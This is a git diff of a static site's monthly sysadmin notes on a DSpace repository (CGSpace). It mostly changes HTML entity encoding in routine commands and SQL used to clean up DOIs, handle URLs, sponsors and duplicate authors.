<pre tabindex="0"><code>$ for community in 10568/171 10568/27868 10568/231 10568/27869 10568/150 10568/230 10568/32724 10568/172; do /home/cgspace.cgiar.org/bin/dspace community-filiator --remove --parent=10568/27866 --child=&quot;$community&quot; &amp;&amp; /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/79164 --child=&quot;$community&quot;; done
<pre tabindex="0"><code>$ for community in 10568/171 10568/27868 10568/231 10568/27869 10568/150 10568/230 10568/32724 10568/172; do /home/cgspace.cgiar.org/bin/dspace community-filiator --remove --parent=10568/27866 --child=&#34;$community&#34; &amp;&amp; /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/79164 --child=&#34;$community&#34;; done
</code></pre><ul>
<li>Move some collections with <a href="https://gist.github.com/alanorth/e60b530ed4989df0c731afbb0c640515"><code>move-collections.sh</code></a> using the following config:</li>
</ul>
@ -311,7 +311,7 @@ $ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -
<li>Run all updates on DSpace Test and reboot the server</li>
<li>Run fixes for Journal titles on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/fix-49-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p 'password'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/fix-49-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p &#39;password&#39;
</code></pre><ul>
<li>Create a new list of the top 500 journal titles from the database:</li>
</ul>

View File

@ -50,7 +50,7 @@ DELETE 1
Create issue on GitHub to track the addition of CCAFS Phase II project tags (#301)
Looks like we&rsquo;ll be using cg.identifier.ccafsprojectpii as the field name
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -140,7 +140,7 @@ Looks like we&rsquo;ll be using cg.identifier.ccafsprojectpii as the field name
<ul>
<li>An item was mapped twice erroneously again, so I had to remove one of the mappings manually:</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = '80278';
<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = &#39;80278&#39;;
id | collection_id | item_id
-------+---------------+---------
92551 | 313 | 80278
@ -166,7 +166,7 @@ DELETE 1
<li>The climate risk management one doesn&rsquo;t exist, so I will have to ask Magdalena if they want me to add it to the input forms</li>
<li>Start testing some nearly 500 author corrections that CCAFS sent me:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/CCAFS-Authors-Feb-7.csv -f dc.contributor.author -t 'correct name' -m 3 -d dspace -u dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/CCAFS-Authors-Feb-7.csv -f dc.contributor.author -t &#39;correct name&#39; -m 3 -d dspace -u dspace -p fuuu
</code></pre><h2 id="2017-02-09">2017-02-09</h2>
<ul>
<li>More work on CCAFS Phase II stuff</li>
@ -219,51 +219,50 @@ DELETE 1
</code></pre><ul>
<li>And then a SQL command to update existing records:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://hdl.handle.net', 'https://hdl.handle.net') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'uri');
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://hdl.handle.net&#39;, &#39;https://hdl.handle.net&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;uri&#39;);
UPDATE 58193
</code></pre><ul>
<li>Seems to work fine!</li>
<li>I noticed a few items that have incorrect DOI links (<code>dc.identifier.doi</code>), and after looking in the database I see there are over 100 that are missing the scheme or are just plain wrong:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value not like 'http%://%';
<pre tabindex="0"><code>dspace=# select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value not like &#39;http%://%&#39;;
</code></pre><ul>
<li>This will replace any that begin with <code>10.</code> and change them to <code>https://dx.doi.org/10.</code>:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^10\..+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like '10.%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^10\..+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;10.%&#39;;
</code></pre><ul>
<li>This will get any that begin with <code>doi:10.</code> and change them to <code>https://dx.doi.org/10.x</code>:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '^doi:(10\..+$)', 'https://dx.doi.org/\1') where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'doi:10%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;^doi:(10\..+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;doi:10%&#39;;
</code></pre><ul>
<li>Fix DOIs like <code>dx.doi.org/10.</code> to be <code>https://dx.doi.org/10.</code>:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^dx.doi.org/.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'dx.doi.org/%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^dx.doi.org/.+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;dx.doi.org/%&#39;;
</code></pre><ul>
<li>Fix DOIs like <code>http//</code>:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '^http//(dx.doi.org/.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'http//%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;^http//(dx.doi.org/.+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;http//%&#39;;
</code></pre><ul>
<li>Fix DOIs like <code>dx.doi.org./</code>:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^dx.doi.org\./.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'dx.doi.org./%'
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^dx.doi.org\./.+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;dx.doi.org./%&#39;
</code></pre><ul>
<li>Delete some invalid DOIs:</li>
</ul>
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value in ('DOI','CPWF Mekong','Bulawayo, Zimbabwe','bb');
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value in (&#39;DOI&#39;,&#39;CPWF Mekong&#39;,&#39;Bulawayo, Zimbabwe&#39;,&#39;bb&#39;);
</code></pre><ul>
<li>Fix some other random outliers:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.1016/j.aquaculture.2015.09.003' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'http:/dx.doi.org/10.1016/j.aquaculture.2015.09.003';
dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.5337/2016.200' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'doi: https://dx.doi.org/10.5337/2016.200';
dspace=# update metadatavalue set text_value = 'https://dx.doi.org/doi:10.1371/journal.pone.0062898' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'Http://dx.doi.org/doi:10.1371/journal.pone.0062898';
dspace=# update metadatavalue set text_value = 'https://dx.doi.10.1016/j.cosust.2013.11.012' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'http:dx.doi.10.1016/j.cosust.2013.11.012';
dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.1080/03632415.2014.883570' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'org/10.1080/03632415.2014.883570';
dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.15446/agron.colomb.v32n3.46052' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'Doi: 10.15446/agron.colomb.v32n3.46052';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/10.1016/j.aquaculture.2015.09.003&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;http:/dx.doi.org/10.1016/j.aquaculture.2015.09.003&#39;;
dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/10.5337/2016.200&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;doi: https://dx.doi.org/10.5337/2016.200&#39;;
dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/doi:10.1371/journal.pone.0062898&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;Http://dx.doi.org/doi:10.1371/journal.pone.0062898&#39;;
dspace=# update metadatavalue set text_value = &#39;https://dx.doi.10.1016/j.cosust.2013.11.012&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;http:dx.doi.10.1016/j.cosust.2013.11.012&#39;;
dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/10.1080/03632415.2014.883570&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;org/10.1080/03632415.2014.883570&#39;;
dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/10.15446/agron.colomb.v32n3.46052&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;Doi: 10.15446/agron.colomb.v32n3.46052&#39;;
</code></pre><ul>
<li>And do another round of <code>http://</code> → <code>https://</code> cleanups:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://dx.doi.org') where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'http://dx.doi.org%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://dx.doi.org&#39;, &#39;https://dx.doi.org&#39;) where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;http://dx.doi.org%&#39;;
</code></pre><ul>
<li>Run all DOI corrections on CGSpace</li>
<li>Something to think about here is to write a <a href="https://wiki.lyrasis.org/display/DSDOC5x/Curation+System#CurationSystem-ScriptedTasks">Curation Task</a> in Java to do these sanity checks / corrections every night</li>
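<li>As a sanity check after running the corrections, counting the malformed values with the earlier query&rsquo;s pattern should now return zero:</li>
</ul>
<pre tabindex="0"><code>dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value not like &#39;http%://%&#39;;
</code></pre><ul>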
@ -282,10 +281,10 @@ dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.15446/agro
</ul>
<pre tabindex="0"><code>$ python
Python 3.6.0 (default, Dec 25 2016, 17:30:53)
&gt;&gt;&gt; print('Entwicklung &amp; Ländlicher Raum')
&gt;&gt;&gt; print(&#39;Entwicklung &amp; Ländlicher Raum&#39;)
Entwicklung &amp; Ländlicher Raum
&gt;&gt;&gt; print('Entwicklung &amp; Ländlicher Raum'.encode())
b'Entwicklung &amp; L\xc3\xa4ndlicher Raum'
&gt;&gt;&gt; print(&#39;Entwicklung &amp; Ländlicher Raum&#39;.encode())
b&#39;Entwicklung &amp; L\xc3\xa4ndlicher Raum&#39;
</code></pre><ul>
<li>So for now I will remove the encode call from the script (though it was never used on the versions on the Linux hosts), leading me to believe it really <em>was</em> a temporary problem, perhaps due to macOS or the Python build I was using.</li>
</ul>
@ -294,11 +293,11 @@ b'Entwicklung &amp; L\xc3\xa4ndlicher Raum'
<li>Testing regenerating PDF thumbnails, like I started in 2016-11</li>
<li>It seems there is a bug in <code>filter-media</code> that causes it to process formats that aren&rsquo;t part of its configuration:</li>
</ul>
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16856 -p &quot;ImageMagick PDF Thumbnail&quot;
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16856 -p &#34;ImageMagick PDF Thumbnail&#34;
File: earlywinproposal_esa_postharvest.pdf.jpg
FILTERED: bitstream 13787 (item: 10568/16881) and created 'earlywinproposal_esa_postharvest.pdf.jpg'
FILTERED: bitstream 13787 (item: 10568/16881) and created &#39;earlywinproposal_esa_postharvest.pdf.jpg&#39;
File: postHarvest.jpg.jpg
FILTERED: bitstream 16524 (item: 10568/24655) and created 'postHarvest.jpg.jpg'
FILTERED: bitstream 16524 (item: 10568/24655) and created &#39;postHarvest.jpg.jpg&#39;
</code></pre><ul>
<li>According to <code>dspace.cfg</code> the ImageMagick PDF Thumbnail plugin should only process PDFs:</li>
</ul>
@ -317,8 +316,8 @@ filter.org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter.inputFormats = A
<ul>
<li>Find all fields with &ldquo;<a href="http://hdl.handle.net">http://hdl.handle.net</a>&rdquo; values (most are in <code>dc.identifier.uri</code>, but some are in other URL-related fields like <code>cg.link.reference</code>, <code>cg.identifier.dataurl</code>, and <code>cg.identifier.url</code>):</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct metadata_field_id from metadatavalue where resource_type_id=2 and text_value like 'http://hdl.handle.net%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://hdl.handle.net', 'https://hdl.handle.net') where resource_type_id=2 and metadata_field_id IN (25, 113, 179, 219, 220, 223) and text_value like 'http://hdl.handle.net%';
<pre tabindex="0"><code>dspace=# select distinct metadata_field_id from metadatavalue where resource_type_id=2 and text_value like &#39;http://hdl.handle.net%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://hdl.handle.net&#39;, &#39;https://hdl.handle.net&#39;) where resource_type_id=2 and metadata_field_id IN (25, 113, 179, 219, 220, 223) and text_value like &#39;http://hdl.handle.net%&#39;;
UPDATE 58633
</code></pre><ul>
<li>This works but I&rsquo;m thinking I&rsquo;ll wait on the replacement as there are perhaps some other places that rely on <code>http://hdl.handle.net</code> (grep the code, it&rsquo;s scary how many things are hard coded)</li>
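<li>For example, a rough count of hard-coded occurrences in the source tree (a sketch; the path is an example):</li>
</ul>
<pre tabindex="0"><code>$ grep -rI &#39;http://hdl.handle.net&#39; [dspace-source]/dspace/ | wc -l
</code></pre><ul>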
@ -345,7 +344,7 @@ Certificate chain
<li>For some reason it is now signed by a private certificate authority</li>
<li>This error seems to have started on 2017-02-25:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;unable to find valid certification path&quot; [dspace]/log/dspace.log.2017-02-*
<pre tabindex="0"><code>$ grep -c &#34;unable to find valid certification path&#34; [dspace]/log/dspace.log.2017-02-*
[dspace]/log/dspace.log.2017-02-01:0
[dspace]/log/dspace.log.2017-02-02:0
[dspace]/log/dspace.log.2017-02-03:0
@ -381,7 +380,7 @@ Certificate chain
<li>The problem likely lies in the logic of <code>ImageMagickThumbnailFilter.java</code>, as <code>ImageMagickPdfThumbnailFilter.java</code> extends it</li>
<li>Run CIAT corrections on CGSpace</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = 'International Center for Tropical Agriculture';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;3026b1de-9302-4f3e-85ab-ef48da024eb2&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = &#39;International Center for Tropical Agriculture&#39;;
</code></pre><ul>
<li>CGNET has fixed the certificate chain on their LDAP server</li>
<li>Redeploy CGSpace and DSpace Test on the latest <code>5_x-prod</code> branch with fixes for LDAP bind user</li>
@ -393,12 +392,12 @@ Certificate chain
<li>Ah, this is probably because some items have the <code>International Center for Tropical Agriculture</code> author twice, which I first noticed in 2016-12 but couldn&rsquo;t figure out how to fix</li>
<li>I think I can do it by first exporting all metadatavalues that have the author <code>International Center for Tropical Agriculture</code></li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select resource_id, metadata_value_id from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='International Center for Tropical Agriculture') to /tmp/ciat.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select resource_id, metadata_value_id from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;International Center for Tropical Agriculture&#39;) to /tmp/ciat.csv with csv;
COPY 1968
</code></pre><ul>
<li>And then use awk to print the duplicate lines to a separate file:</li>
</ul>
<pre tabindex="0"><code>$ awk -F',' 'seen[$1]++' /tmp/ciat.csv &gt; /tmp/ciat-dupes.csv
<pre tabindex="0"><code>$ awk -F&#39;,&#39; &#39;seen[$1]++&#39; /tmp/ciat.csv &gt; /tmp/ciat-dupes.csv
</code></pre><ul>
<li>From that file I can create a list of 279 deletes and put them in a batch script like:</li>
</ul>

View File

@ -54,7 +54,7 @@ Interestingly, it seems DSpace 4.x&rsquo;s thumbnails were sRGB, but forcing reg
$ identify ~/Desktop/alc_contrastes_desafios.jpg
/Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600&#43;0&#43;0 8-bit CMYK 168KB 0.000u 0:00.000
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -180,9 +180,9 @@ $ identify ~/Desktop/alc_contrastes_desafios.jpg
<li>Somehow we need to detect the color system being used by the input file and handle each case differently (with profiles)</li>
<li>This is trivial with <code>identify</code> (even by the <a href="http://im4java.sourceforge.net/api/org/im4java/core/IMOps.html#identify">Java ImageMagick API</a>):</li>
</ul>
<pre tabindex="0"><code>$ identify -format '%r\n' alc_contrastes_desafios.pdf\[0\]
<pre tabindex="0"><code>$ identify -format &#39;%r\n&#39; alc_contrastes_desafios.pdf\[0\]
DirectClass CMYK
$ identify -format '%r\n' Africa\ group\ of\ negotiators.pdf\[0\]
$ identify -format &#39;%r\n&#39; Africa\ group\ of\ negotiators.pdf\[0\]
DirectClass sRGB Alpha
</code></pre><h2 id="2017-03-04">2017-03-04</h2>
<ul>
@ -196,7 +196,7 @@ DirectClass sRGB Alpha
<li>They want something like the items that are returned by the general &ldquo;LAND&rdquo; query in the search interface, but we cannot do that</li>
<li>We can only return specific results for metadata fields, like:</li>
</ul>
<pre tabindex="0"><code>$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.subject.ilri&quot;,&quot;value&quot;: &quot;LAND REFORM&quot;, &quot;language&quot;: null}' | json_pp
<pre tabindex="0"><code>$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;LAND REFORM&#34;, &#34;language&#34;: null}&#39; | json_pp
</code></pre><ul>
<li>But there are hundreds of combinations of fields and values (like <code>dc.subject</code> and all the center subjects), and we can&rsquo;t use wildcards in REST!</li>
<li>Reading about enabling multiple handle prefixes in DSpace</li>
@ -212,11 +212,11 @@ DirectClass sRGB Alpha
<li>Because of this I noticed that our Handle server&rsquo;s <code>config.dct</code> was potentially misconfigured!</li>
<li>We had some default values still present:</li>
</ul>
<pre tabindex="0"><code>&quot;300:0.NA/YOUR_NAMING_AUTHORITY&quot;
<pre tabindex="0"><code>&#34;300:0.NA/YOUR_NAMING_AUTHORITY&#34;
</code></pre><ul>
<li>I&rsquo;ve changed them to the following and restarted the handle server:</li>
</ul>
<pre tabindex="0"><code>&quot;300:0.NA/10568&quot;
<pre tabindex="0"><code>&#34;300:0.NA/10568&#34;
</code></pre><ul>
<li>In looking at all the configs I just noticed that we are not providing a DOI in the Google-specific metadata crosswalk</li>
<li>From <code>dspace/config/crosswalks/google-metadata.properties</code>:</li>
@ -225,10 +225,10 @@ DirectClass sRGB Alpha
</code></pre><ul>
<li>This works, and makes DSpace output the following metadata on the item view page:</li>
</ul>
<pre tabindex="0"><code>&lt;meta content=&quot;https://dx.doi.org/10.1186/s13059-017-1153-y&quot; name=&quot;citation_doi&quot;&gt;
<pre tabindex="0"><code>&lt;meta content=&#34;https://dx.doi.org/10.1186/s13059-017-1153-y&#34; name=&#34;citation_doi&#34;&gt;
</code></pre><ul>
<li>Submitted and merged pull request for this: <a href="https://github.com/ilri/DSpace/pull/305">https://github.com/ilri/DSpace/pull/305</a></li>
<li>Submit pull request to set the author separator for XMLUI item lists to a semicolon instead of &ldquo;,&quot;: <a href="https://github.com/ilri/DSpace/pull/306">https://github.com/ilri/DSpace/pull/306</a></li>
<li>Submit pull request to set the author separator for XMLUI item lists to a semicolon instead of &ldquo;,&rdquo;: <a href="https://github.com/ilri/DSpace/pull/306">https://github.com/ilri/DSpace/pull/306</a></li>
<li>I want to show it briefly to Abenet and Peter to get feedback</li>
</ul>
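<ul>
<li>A quick spot check of the new <code>citation_doi</code> tag on a live item page (a sketch; the handle is a placeholder):</li>
</ul>
<pre tabindex="0"><code>$ curl -s &#39;https://dspacetest.cgiar.org/handle/10568/12345&#39; | grep citation_doi
</code></pre>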
<h2 id="2017-03-06">2017-03-06</h2>
@ -260,7 +260,7 @@ DirectClass sRGB Alpha
<ul>
<li>Export list of sponsors so Peter can clean it up:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'sponsorship') group by text_value order by count desc) to /tmp/sponsorship.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;description&#39; and qualifier = &#39;sponsorship&#39;) group by text_value order by count desc) to /tmp/sponsorship.csv with csv;
COPY 285
</code></pre><h2 id="2017-03-12">2017-03-12</h2>
<ul>
@ -271,7 +271,7 @@ $ ./delete-metadata-values.py -i Investors-Delete-121.csv -f dc.description.spon
</code></pre><ul>
<li>Generate a new list of unique sponsors so we can update the controlled vocabulary:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'sponsorship')) to /tmp/sponsorship.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;description&#39; and qualifier = &#39;sponsorship&#39;)) to /tmp/sponsorship.csv with csv;
</code></pre><ul>
<li>Pull request for controlled vocabulary if Peter approves: <a href="https://github.com/ilri/DSpace/pull/308">https://github.com/ilri/DSpace/pull/308</a></li>
<li>Review Sisay&rsquo;s roots, tubers, and bananas (RTB) theme, which still needs some fixes to work properly: <a href="https://github.com/ilri/DSpace/pull/307">https://github.com/ilri/DSpace/pull/307</a></li>
@ -325,11 +325,11 @@ $ ./delete-metadata-values.py -i Investors-Delete-121.csv -f dc.description.spon
<ul>
<li>Dump a list of fields in the DC and CG schemas to compare with CG Core:</li>
</ul>
<pre tabindex="0"><code>dspace=# select case when metadata_schema_id=1 then 'dc' else 'cg' end as schema, element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
<pre tabindex="0"><code>dspace=# select case when metadata_schema_id=1 then &#39;dc&#39; else &#39;cg&#39; end as schema, element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
</code></pre><ul>
<li>Ooh, a better one!</li>
</ul>
<pre tabindex="0"><code>dspace=# select coalesce(case when metadata_schema_id=1 then 'dc.' else 'cg.' end) || concat_ws('.', element, qualifier) as field, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
<pre tabindex="0"><code>dspace=# select coalesce(case when metadata_schema_id=1 then &#39;dc.&#39; else &#39;cg.&#39; end) || concat_ws(&#39;.&#39;, element, qualifier) as field, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
</code></pre><h2 id="2017-03-30">2017-03-30</h2>
<ul>
<li>Adjust the Linode CPU usage alerts for the CGSpace server from 150% to 200%, as generally the nightly Solr indexing causes a usage around 150&ndash;190%, so this should make the alerts less regular</li>

View File

@ -17,7 +17,7 @@ Quick proof-of-concept hack to add dc.rights to the input form, including some i
Remove redundant/duplicate text in the DSpace submission license
Testing the CMYK patch on a collection with 650 items:
$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt
$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2017-04/" />
@ -38,9 +38,9 @@ Quick proof-of-concept hack to add dc.rights to the input form, including some i
Remove redundant/duplicate text in the DSpace submission license
Testing the CMYK patch on a collection with 650 items:
$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt
$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -136,12 +136,12 @@ $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Th
<li>Remove redundant/duplicate text in the DSpace submission license</li>
<li>Testing the CMYK patch on a collection with 650 items:</li>
</ul>
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
</code></pre><h2 id="2017-04-03">2017-04-03</h2>
<ul>
<li>Continue testing the CMYK patch on more communities:</li>
</ul>
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/1 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&gt; /tmp/filter-media-cmyk.txt 2&gt;&amp;1
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/1 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&gt; /tmp/filter-media-cmyk.txt 2&gt;&amp;1
</code></pre><ul>
<li>So far there are almost 500:</li>
</ul>
@ -174,17 +174,17 @@ ILAC_Brief21_PMCA.pdf: 113462 bytes, checksum: 249fef468f401c066a119f5db687add0
</code></pre><ul>
<li>This SQL query returns fields that were submitted or approved by giampieri in 2016 and contain a &ldquo;checksum&rdquo; (ie, there was a bitstream in the submission):</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^(Submitted|Approved).*giampieri.*2016-.*checksum.*';
